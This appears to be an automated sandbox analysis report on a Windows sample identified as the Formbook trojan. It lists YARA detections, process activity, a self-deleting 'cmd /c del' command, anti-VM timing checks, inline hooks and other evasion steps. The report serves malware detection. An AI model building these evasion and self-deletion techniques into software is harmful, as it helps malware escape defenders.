          Source: 00000007.00000002.3301684101.0000000009270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: yaM8XR1HfL.exe PID: 1288, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: WWAHost.exe PID: 4424, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: yaM8XR1HfL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@2/1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001BED2C memset,memset,EnterCriticalSection,FormatMessageW,GetLastError,FormatMessageW,GetLastError,GetCurrentThreadId,LocalFree,9_2_001BED2C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yaM8XR1HfL.exe.logJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
          Source: yaM8XR1HfL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: yaM8XR1HfL.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: yaM8XR1HfL.exeReversingLabs: Detection: 68%
          Source: unknownProcess created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe "C:\Windows\SysWOW64\WWAHost.exe"
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"Jump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe "C:\Windows\SysWOW64\WWAHost.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe"Jump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: yaM8XR1HfL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: yaM8XR1HfL.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: WWAHost.pdb source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: yaM8XR1HfL.exe, yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected DarkTortilla Crypter
          Source: Yara matchFile source: 0.2.yaM8XR1HfL.exe.3a926c0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.yaM8XR1HfL.exe.3a926c0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.yaM8XR1HfL.exe.53f0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.yaM8XR1HfL.exe.53f0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2494695632.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: yaM8XR1HfL.exe, w4M6D.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0014AA8C GetCurrentThreadId,LoadLibraryW,GetProcAddress,9_2_0014AA8C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_05C313BF push cs; ret 0_2_05C313CE
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07210EC5 push FFFFFFE9h; ret 0_2_07210EC7
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07210DC6 push FFFFFFE9h; retn 0001h0_2_07210DC8
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07219191 pushad ; ret 0_2_072191A3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_075659EB push FFFFFFC3h; ret 0_2_07565A25
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 0_2_07CDF508 push 00000059h; ret 0_2_07CDF516
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0145225F pushad ; ret 4_2_014527F9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014527FA pushad ; ret 4_2_014527F9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014809AD push ecx; mov dword ptr [esp], ecx4_2_014809B6
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0145283D push eax; iretd 4_2_01452858
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0145135E push eax; iretd 4_2_01451369
          Source: C:\Windows\explorer.exeCode function: 7_2_0925BB02 push esp; retn 0000h7_2_0925BB03
          Source: C:\Windows\explorer.exeCode function: 7_2_0925BB1E push esp; retn 0000h7_2_0925BB1F
          Source: C:\Windows\explorer.exeCode function: 7_2_0925B9B5 push esp; retn 0000h7_2_0925BAE7
          Source: C:\Windows\explorer.exeCode function: 7_2_106E49B5 push esp; retn 0000h7_2_106E4AE7
          Source: C:\Windows\explorer.exeCode function: 7_2_106E4B02 push esp; retn 0000h7_2_106E4B03
          Source: C:\Windows\explorer.exeCode function: 7_2_106E4B1E push esp; retn 0000h7_2_106E4B1F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00126F7C push eax; retf 9_2_00126F85
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00127036 push eax; retf 9_2_00127EF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00127026 pushad ; iretd 9_2_00127029
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00173168 push ecx; ret 9_2_0017317B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00129431 push ds; iretd 9_2_00129432
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00129537 push esi; retf 9_2_0012954C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0012959A push CFE2086Ah; ret 9_2_001295AB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001296FD push ds; iretd 9_2_001296FE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00127CEA push eax; retf 9_2_00127EF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040527FA pushad ; ret 9_2_040527F9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0405225F pushad ; ret 9_2_040527F9
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0405283D push eax; iretd 9_2_04052858
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040809AD push ecx; mov dword ptr [esp], ecx9_2_040809B6
          Source: yaM8XR1HfL.exeStatic PE information: section name: .text entropy: 7.1884613511282724

          Hooking and other Techniques for Hiding and Protection

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeFile opened: C:\Users\user\Desktop\yaM8XR1HfL.exe\:Zone.Identifier read attributes | deleteJump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 2F79904 second address: 2F7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 2F79B7E second address: 2F79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: 4850000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: 7CE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: 8CE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: 8EB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: 9EB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: A240000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: B240000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeMemory allocated: C240000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014C096E rdtsc 4_2_014C096E
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 809Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 791Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeWindow / User API: threadDelayed 9730Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeAPI coverage: 0.9 %
          Source: C:\Windows\SysWOW64\WWAHost.exeAPI coverage: 0.7 %
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 348Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 6648Thread sleep time: -63000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 2764Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4788Thread sleep time: -34000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572Thread sleep count: 240 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572Thread sleep time: -480000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572Thread sleep count: 9730 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572Thread sleep time: -19460000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0016B120 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [esi+000000a4h], 03h and CTI: je 00191D18h9_2_0016B120
